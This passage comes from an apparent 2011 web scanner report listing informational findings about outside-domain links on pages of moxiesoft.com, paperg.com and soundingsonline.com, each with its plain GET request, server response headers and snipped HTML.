</a>..|..<a href="http://feeds.feedburner.com/MoxieSoft" target="_blank"><img title="RSS Feed" border="0" alt="RSS Feed" align="absMiddle" src="/uploadedImages/rss.gif" width="18" height="15" />
...[SNIP]...

17.316. http://www.moxiesoft.com/tal_lp/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_lp/default.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /tal_lp/default.aspx?id=2736 HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:05:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 80054


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
</script>
   <link rel="alternate" type="application/rss+xml" title="Moxie Software Press Room Updates" href="http://feeds.feedburner.com/MoxieSoft" /><link rel="alternate" type="application/rss+xml" title="Subscribe to Our Moxie Blog" href="http://feeds.feedburner.com/MoxieBlog/" />

<!--
<script type="text/javascript" src="http://ngencim.ngenera.com/NetAgent/webcollab/includes/LoadFiles.aspx?file=wc.js">
...[SNIP]...
<td class="HeaderText"><a href="http://members.ngenera.com/">Member Login</a>
...[SNIP]...
<td class="HeaderText"><a href="http://www.moxieinsight.com/">Blog</a>
...[SNIP]...
<td class="HeaderText"><a href="http://community.ngenera.com/">Community</a>
...[SNIP]...
<li id="TM3">
                   <a href="http://www.moxieinsight.com/" title="Insight" target="_blank">Insight</a>
...[SNIP]...
</a>....|....<a title="visit our YouTube channel" href="http://www.youtube.com/moxiesoft" target="_blank"><img style="MARGIN-BOTTOM: -4px" title="visit our YouTube channel" border="0" alt="visit our YouTube channel" src="/tal_images/home4/youtube-logo.gif" width="38" height="15" /></a>..| ..<a title="visit us on Twitter" href="http://twitter.com/moxiesoft" target="_blank" border="0" align="absMiddle"><img title="visit us on Twitter" border="0" alt="visit us on Twitter" align="absMiddle" src="/uploadedImages/twitter.png" target="_blank" />
...[SNIP]...
</a> | <a title="visit us on LinkedIn" href="http://www.linkedin.com/companies/1229260" target="_blank" border="0" align="absMiddle" src="/uploadedImages/linkedin.gif" hspace="2"><img title="visit us on LinkedIn" border="0" hspace="2" alt="visit us on LinkedIn" align="middle" src="/uploadedImages/linkedin.gif" target="_blank" />
...[SNIP]...
</a> |..<a title="visit us on Facebook" href="http://www.facebook.com/pages/Moxie-Software/144466498927860" target="_blank" border="0" align="Middle" src="http://cim.ngenera.com/uploadedImages/facebook.jpg" hspace="2"><img title="visit us on Facebook" border="0" hspace="2" alt="visit us on Facebook" align="absMiddle" src="/uploadedImages/facebook.jpg" target="_blank" />
...[SNIP]...
</a>..|..<a href="http://feeds.feedburner.com/MoxieSoft" target="_blank"><img title="RSS Feed" border="0" alt="RSS Feed" align="absMiddle" src="/uploadedImages/rss.gif" width="18" height="15" />
...[SNIP]...

17.317. http://www.moxiesoft.com/tal_news/press_release.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_news/press_release.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /tal_news/press_release.aspx?id=3530 HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45860


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
</script>
   <link rel="alternate" type="application/rss+xml" title="Moxie Software Press Room Updates" href="http://feeds.feedburner.com/MoxieSoft" /><link rel="alternate" type="application/rss+xml" title="Subscribe to Our Moxie Blog" href="http://feeds.feedburner.com/MoxieBlog/" />

<!--
<script type="text/javascript" src="http://ngencim.ngenera.com/NetAgent/webcollab/includes/LoadFiles.aspx?file=wc.js">
...[SNIP]...
<td class="HeaderText"><a href="http://members.ngenera.com/">Member Login</a>
...[SNIP]...
<td class="HeaderText"><a href="http://www.moxieinsight.com/">Blog</a>
...[SNIP]...
<td class="HeaderText"><a href="http://community.ngenera.com/">Community</a>
...[SNIP]...
<li id="TM3">
                   <a href="http://www.moxieinsight.com/" title="Insight" target="_blank">Insight</a>
...[SNIP]...
<a class="a2a_dd" href="#"><img style="MARGIN-BOTTOM: 14px" border="0" alt="Share/Bookmark" src="http://static.addtoany.com/buttons/share_save_120_16.gif" width="120" height="16" /></a>
...[SNIP]...
</script><script type="text/javascript" src="http://static.addtoany.com/menu/page.js"><!--
//-->
...[SNIP]...
<h1>World-Renowned Author and <a href="http://www.moxieinsight.com/" target="_blank">Moxie Insight</a>
...[SNIP]...
<p>He is the Chairman of <a title="moxie insight" href="http://www.moxieinsight.com/" target="_blank">Moxie Insight</a>, the thought leadership arm of <a href="http://www.moxiesoftware.com/">Moxie Software</a>
...[SNIP]...
<br /><a href="http://www.dld-conference.com/" target="_blank">DLD11...s</a>
...[SNIP]...
<br /><a href="http://www.weforum.org/" target="_blank"><br />
...[SNIP]...
</a>....|....<a title="visit our YouTube channel" href="http://www.youtube.com/moxiesoft" target="_blank"><img style="MARGIN-BOTTOM: -4px" title="visit our YouTube channel" border="0" alt="visit our YouTube channel" src="/tal_images/home4/youtube-logo.gif" width="38" height="15" /></a>..| ..<a title="visit us on Twitter" href="http://twitter.com/moxiesoft" target="_blank" border="0" align="absMiddle"><img title="visit us on Twitter" border="0" alt="visit us on Twitter" align="absMiddle" src="/uploadedImages/twitter.png" target="_blank" />
...[SNIP]...
</a> | <a title="visit us on LinkedIn" href="http://www.linkedin.com/companies/1229260" target="_blank" border="0" align="absMiddle" src="/uploadedImages/linkedin.gif" hspace="2"><img title="visit us on LinkedIn" border="0" hspace="2" alt="visit us on LinkedIn" align="middle" src="/uploadedImages/linkedin.gif" target="_blank" />
...[SNIP]...
</a> |..<a title="visit us on Facebook" href="http://www.facebook.com/pages/Moxie-Software/144466498927860" target="_blank" border="0" align="Middle" src="http://cim.ngenera.com/uploadedImages/facebook.jpg" hspace="2"><img title="visit us on Facebook" border="0" hspace="2" alt="visit us on Facebook" align="absMiddle" src="/uploadedImages/facebook.jpg" target="_blank" />
...[SNIP]...
</a>..|..<a href="http://feeds.feedburner.com/MoxieSoft" target="_blank"><img title="RSS Feed" border="0" alt="RSS Feed" align="absMiddle" src="/uploadedImages/rss.gif" width="18" height="15" />
...[SNIP]...

17.318. http://www.moxiesoft.com/tal_news/webinars/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_news/webinars/default.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /tal_news/webinars/default.aspx?id=3436 HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 82954


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
</script>
   <link rel="alternate" type="application/rss+xml" title="Moxie Software Press Room Updates" href="http://feeds.feedburner.com/MoxieSoft" /><link rel="alternate" type="application/rss+xml" title="Subscribe to Our Moxie Blog" href="http://feeds.feedburner.com/MoxieBlog/" />

<!--
<script type="text/javascript" src="http://ngencim.ngenera.com/NetAgent/webcollab/includes/LoadFiles.aspx?file=wc.js">
...[SNIP]...
<td class="HeaderText"><a href="http://members.ngenera.com/">Member Login</a>
...[SNIP]...
<td class="HeaderText"><a href="http://www.moxieinsight.com/">Blog</a>
...[SNIP]...
<td class="HeaderText"><a href="http://community.ngenera.com/">Community</a>
...[SNIP]...
<li id="TM3">
                   <a href="http://www.moxieinsight.com/" title="Insight" target="_blank">Insight</a>
...[SNIP]...
</a>....|....<a title="visit our YouTube channel" href="http://www.youtube.com/moxiesoft" target="_blank"><img style="MARGIN-BOTTOM: -4px" title="visit our YouTube channel" border="0" alt="visit our YouTube channel" src="/tal_images/home4/youtube-logo.gif" width="38" height="15" /></a>..| ..<a title="visit us on Twitter" href="http://twitter.com/moxiesoft" target="_blank" border="0" align="absMiddle"><img title="visit us on Twitter" border="0" alt="visit us on Twitter" align="absMiddle" src="/uploadedImages/twitter.png" target="_blank" />
...[SNIP]...
</a> | <a title="visit us on LinkedIn" href="http://www.linkedin.com/companies/1229260" target="_blank" border="0" align="absMiddle" src="/uploadedImages/linkedin.gif" hspace="2"><img title="visit us on LinkedIn" border="0" hspace="2" alt="visit us on LinkedIn" align="middle" src="/uploadedImages/linkedin.gif" target="_blank" />
...[SNIP]...
</a> |..<a title="visit us on Facebook" href="http://www.facebook.com/pages/Moxie-Software/144466498927860" target="_blank" border="0" align="Middle" src="http://cim.ngenera.com/uploadedImages/facebook.jpg" hspace="2"><img title="visit us on Facebook" border="0" hspace="2" alt="visit us on Facebook" align="absMiddle" src="/uploadedImages/facebook.jpg" target="_blank" />
...[SNIP]...
</a>..|..<a href="http://feeds.feedburner.com/MoxieSoft" target="_blank"><img title="RSS Feed" border="0" alt="RSS Feed" align="absMiddle" src="/uploadedImages/rss.gif" width="18" height="15" />
...[SNIP]...

17.319. http://www.moxiesoft.com/tal_products/chat.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/chat.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /tal_products/chat.aspx?ac=PPC.B.live%20chat HTTP/1.1
Host: www.moxiesoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 13:58:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=elqucae4pira41q1xauy2i45; path=/; HttpOnly
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; path=/
Set-Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; expires=Sat, 28-Jan-2012 13:58:55 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43216


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
</script>
   <link rel="alternate" type="application/rss+xml" title="Moxie Software Press Room Updates" href="http://feeds.feedburner.com/MoxieSoft" /><link rel="alternate" type="application/rss+xml" title="Subscribe to Our Moxie Blog" href="http://feeds.feedburner.com/MoxieBlog/" />

<!--
<script type="text/javascript" src="http://ngencim.ngenera.com/NetAgent/webcollab/includes/LoadFiles.aspx?file=wc.js">
...[SNIP]...
<td class="HeaderText"><a href="http://members.ngenera.com/">Member Login</a>
...[SNIP]...
<td class="HeaderText"><a href="http://www.moxieinsight.com/">Blog</a>
...[SNIP]...
<td class="HeaderText"><a href="http://community.ngenera.com/">Community</a>
...[SNIP]...
<li id="TM3">
                   <a href="http://www.moxieinsight.com/" title="Insight" target="_blank">Insight</a>
...[SNIP]...
</a>....|....<a title="visit our YouTube channel" href="http://www.youtube.com/moxiesoft" target="_blank"><img style="MARGIN-BOTTOM: -4px" title="visit our YouTube channel" border="0" alt="visit our YouTube channel" src="/tal_images/home4/youtube-logo.gif" width="38" height="15" /></a>..| ..<a title="visit us on Twitter" href="http://twitter.com/moxiesoft" target="_blank" border="0" align="absMiddle"><img title="visit us on Twitter" border="0" alt="visit us on Twitter" align="absMiddle" src="/uploadedImages/twitter.png" target="_blank" />
...[SNIP]...
</a> | <a title="visit us on LinkedIn" href="http://www.linkedin.com/companies/1229260" target="_blank" border="0" align="absMiddle" src="/uploadedImages/linkedin.gif" hspace="2"><img title="visit us on LinkedIn" border="0" hspace="2" alt="visit us on LinkedIn" align="middle" src="/uploadedImages/linkedin.gif" target="_blank" />
...[SNIP]...
</a> |..<a title="visit us on Facebook" href="http://www.facebook.com/pages/Moxie-Software/144466498927860" target="_blank" border="0" align="Middle" src="http://cim.ngenera.com/uploadedImages/facebook.jpg" hspace="2"><img title="visit us on Facebook" border="0" hspace="2" alt="visit us on Facebook" align="absMiddle" src="/uploadedImages/facebook.jpg" target="_blank" />
...[SNIP]...
</a>..|..<a href="http://feeds.feedburner.com/MoxieSoft" target="_blank"><img title="RSS Feed" border="0" alt="RSS Feed" align="absMiddle" src="/uploadedImages/rss.gif" width="18" height="15" />
...[SNIP]...
<!--End VisitorTrack Code-->
   <script language="javascript" src="http://ngencim.ngenera.com/netagent/proactive/proactive.aspx"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1072669760/?label=n2YjCIzh_QEQwMi-_wM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...

17.320. http://www.moxiesoft.com/tal_products/chat_tour2.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/chat_tour2.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /tal_products/chat_tour2.aspx?id=1436 HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:01:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44134


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
</script>
   <link rel="alternate" type="application/rss+xml" title="Moxie Software Press Room Updates" href="http://feeds.feedburner.com/MoxieSoft" /><link rel="alternate" type="application/rss+xml" title="Subscribe to Our Moxie Blog" href="http://feeds.feedburner.com/MoxieBlog/" />

<!--
<script type="text/javascript" src="http://ngencim.ngenera.com/NetAgent/webcollab/includes/LoadFiles.aspx?file=wc.js">
...[SNIP]...
<td class="HeaderText"><a href="http://members.ngenera.com/">Member Login</a>
...[SNIP]...
<td class="HeaderText"><a href="http://www.moxieinsight.com/">Blog</a>
...[SNIP]...
<td class="HeaderText"><a href="http://community.ngenera.com/">Community</a>
...[SNIP]...
<li id="TM3">
                   <a href="http://www.moxieinsight.com/" title="Insight" target="_blank">Insight</a>
...[SNIP]...
</a>....|....<a title="visit our YouTube channel" href="http://www.youtube.com/moxiesoft" target="_blank"><img style="MARGIN-BOTTOM: -4px" title="visit our YouTube channel" border="0" alt="visit our YouTube channel" src="/tal_images/home4/youtube-logo.gif" width="38" height="15" /></a>..| ..<a title="visit us on Twitter" href="http://twitter.com/moxiesoft" target="_blank" border="0" align="absMiddle"><img title="visit us on Twitter" border="0" alt="visit us on Twitter" align="absMiddle" src="/uploadedImages/twitter.png" target="_blank" />
...[SNIP]...
</a> | <a title="visit us on LinkedIn" href="http://www.linkedin.com/companies/1229260" target="_blank" border="0" align="absMiddle" src="/uploadedImages/linkedin.gif" hspace="2"><img title="visit us on LinkedIn" border="0" hspace="2" alt="visit us on LinkedIn" align="middle" src="/uploadedImages/linkedin.gif" target="_blank" />
...[SNIP]...
</a> |..<a title="visit us on Facebook" href="http://www.facebook.com/pages/Moxie-Software/144466498927860" target="_blank" border="0" align="Middle" src="http://cim.ngenera.com/uploadedImages/facebook.jpg" hspace="2"><img title="visit us on Facebook" border="0" hspace="2" alt="visit us on Facebook" align="absMiddle" src="/uploadedImages/facebook.jpg" target="_blank" />
...[SNIP]...
</a>..|..<a href="http://feeds.feedburner.com/MoxieSoft" target="_blank"><img title="RSS Feed" border="0" alt="RSS Feed" align="absMiddle" src="/uploadedImages/rss.gif" width="18" height="15" />
...[SNIP]...

17.321. http://www.moxiesoft.com/tal_resources/content.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_resources/content.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /tal_resources/content.aspx?id=2852 HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26734


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
</script>
   <link rel="alternate" type="application/rss+xml" title="Moxie Software Press Room Updates" href="http://feeds.feedburner.com/MoxieSoft" /><link rel="alternate" type="application/rss+xml" title="Subscribe to Our Moxie Blog" href="http://feeds.feedburner.com/MoxieBlog/" />

<!--
<script type="text/javascript" src="http://ngencim.ngenera.com/NetAgent/webcollab/includes/LoadFiles.aspx?file=wc.js">
...[SNIP]...
<td class="HeaderText"><a href="http://members.ngenera.com/">Member Login</a>
...[SNIP]...
<td class="HeaderText"><a href="http://www.moxieinsight.com/">Blog</a>
...[SNIP]...
<td class="HeaderText"><a href="http://community.ngenera.com/">Community</a>
...[SNIP]...
<li id="TM3">
                   <a href="http://www.moxieinsight.com/" title="Insight" target="_blank">Insight</a>
...[SNIP]...
</a>....|....<a title="visit our YouTube channel" href="http://www.youtube.com/moxiesoft" target="_blank"><img style="MARGIN-BOTTOM: -4px" title="visit our YouTube channel" border="0" alt="visit our YouTube channel" src="/tal_images/home4/youtube-logo.gif" width="38" height="15" /></a>..| ..<a title="visit us on Twitter" href="http://twitter.com/moxiesoft" target="_blank" border="0" align="absMiddle"><img title="visit us on Twitter" border="0" alt="visit us on Twitter" align="absMiddle" src="/uploadedImages/twitter.png" target="_blank" />
...[SNIP]...
</a> | <a title="visit us on LinkedIn" href="http://www.linkedin.com/companies/1229260" target="_blank" border="0" align="absMiddle" src="/uploadedImages/linkedin.gif" hspace="2"><img title="visit us on LinkedIn" border="0" hspace="2" alt="visit us on LinkedIn" align="middle" src="/uploadedImages/linkedin.gif" target="_blank" />
...[SNIP]...
</a> |..<a title="visit us on Facebook" href="http://www.facebook.com/pages/Moxie-Software/144466498927860" target="_blank" border="0" align="Middle" src="http://cim.ngenera.com/uploadedImages/facebook.jpg" hspace="2"><img title="visit us on Facebook" border="0" hspace="2" alt="visit us on Facebook" align="absMiddle" src="/uploadedImages/facebook.jpg" target="_blank" />
...[SNIP]...
</a>..|..<a href="http://feeds.feedburner.com/MoxieSoft" target="_blank"><img title="RSS Feed" border="0" alt="RSS Feed" align="absMiddle" src="/uploadedImages/rss.gif" width="18" height="15" />
...[SNIP]...

17.322. https://www.paperg.com/post.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paperg.com
Path:   /post.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /post.php?bid=2123&pid=3922&post HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:17:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>
       
       <meta http-equiv="Content-Type" co
...[SNIP]...
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
       
       
       <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</div>
       <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
   </script>
...[SNIP]...

17.323. http://www.soundingsonline.com/component/chronocontact/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/chronocontact/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /component/chronocontact/?chronoformname=PSPage HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>
...[SNIP]...
www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollO
...[SNIP]...
<li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>
...[SNIP]...
<li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>
...[SNIP]...
<li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>
...[SNIP]...
<li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>
...[SNIP]...
<li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>
...[SNIP]...
<li class="item232"><a href="http://www.barkerstores.com/soundings/"><span>
...[SNIP]...
<p align="center"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=58g&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"> <img src="/images/cgaux_graphics/SND.Jul.09.jpg" width="100" border="0" height="135" />
...[SNIP]...
<p align="center"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=51M&SOURCE=INT75&RDRID=&SBTYPE=QN&PGTP=S"><img src="/images/cgaux_graphics/trade_1008_cover_100p.jpg" width="100" border="0" height="135" />
...[SNIP]...
<div class="chronoform">
<a href="http://www.chronoengine.com">Joomla Professional Work</a>
...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script><br /><div id="PG_link" align="center"><a href="http://www.paperg.com/">Local advertising</a>
...[SNIP]...
<li class="item58"><a href="http://www.dominionenterprises.com/main/do/Privacy_Policy" target="_blank"><span>
...[SNIP]...
<li class="item57"><a href="http://www.dominionenterprises.com/main/do/Terms_of_Use" target="_blank"><span>
...[SNIP]...
</script>
